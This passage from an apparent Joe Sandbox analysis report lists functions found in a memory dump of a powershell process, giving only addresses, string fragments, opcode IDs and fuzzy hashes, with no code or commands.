                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$d5j
                                                                                                                                                                                                                                  • API String ID: 0-3658821374
                                                                                                                                                                                                                                  • Opcode ID: 13f939035015b8fbd691926d3b4fa02fa28ac593ca8280055256d40727d3c5fb
                                                                                                                                                                                                                                  • Instruction ID: dd16759e05d7039ac767a4377c3db27a1445ef6b0b59ef0d3060a5d43d090c7e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13f939035015b8fbd691926d3b4fa02fa28ac593ca8280055256d40727d3c5fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E108B1B04246CFCB249B6C98146ABFBF6AFC5310B2A84BBD605DB355DB31C845C7A1
                                                                                                                                                                                                                                  Function 07DF14E8 Relevance: 8.9, Strings: 7, Instructions: 188COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q$$^q$k$k
                                                                                                                                                                                                                                  • API String ID: 0-283049261
                                                                                                                                                                                                                                  • Opcode ID: da281117ef286a5a62058b5b5f39f58fc8c36f398a2b83118fe98d58c1185e7a
                                                                                                                                                                                                                                  • Instruction ID: c177e68b432cd789af4df30b31c66966aabebdf9906f99bb5364dceedeea67dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da281117ef286a5a62058b5b5f39f58fc8c36f398a2b83118fe98d58c1185e7a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B15137B1B0430ECFDB249A6D9410666FBB6AFC2610F29847BD646CB391DA37C885C761
                                                                                                                                                                                                                                  Function 07DF34F8 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                                                                                  • Opcode ID: 0d4979a1b469f00af80dc152d1a6dfdf22f27d3dcb21957a4eafc9b4ae3ac854
                                                                                                                                                                                                                                  • Instruction ID: cfb44e5b8ea3db49afc68cbdc5c5035085f1e2821fb8d964cd3906505d710f63
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d4979a1b469f00af80dc152d1a6dfdf22f27d3dcb21957a4eafc9b4ae3ac854
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F315AB27483446FDB2555399811BA7FFE68BC2310F27946BE644CF392DD29C8498361
                                                                                                                                                                                                                                  Function 07DF3518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2125118731
                                                                                                                                                                                                                                  • Opcode ID: bfa531f41acdc78d3bcb9fe455a1e74fc385d172204ca4af4222ca6aed5adcbd
                                                                                                                                                                                                                                  • Instruction ID: 367f1e059bd3fd98166c22e00a3f11671545e31a087b879929f17b1d7afa658e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfa531f41acdc78d3bcb9fe455a1e74fc385d172204ca4af4222ca6aed5adcbd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 232166B270434A5BDB38697EA801B37FEDA9BC0714F26843AE605CF391DE36C8448361
                                                                                                                                                                                                                                  Function 07DF0570 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2026592960.0000000007DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DF0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_7df0000_powershell.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                                  • API String ID: 0-2049395529
                                                                                                                                                                                                                                  • Opcode ID: 63f31836cb51ff508f3c833922047f1aae9b1ce60fe87011d56cb5062a42a5be
                                                                                                                                                                                                                                  • Instruction ID: 557b068d10629734a9660fa285197de4e443d95bcfdc186aebf13872c5167140
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63f31836cb51ff508f3c833922047f1aae9b1ce60fe87011d56cb5062a42a5be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE01F26170D3854FC32A13281820456AFB25BD350072A44ABC181CF397DDA98C4A83A7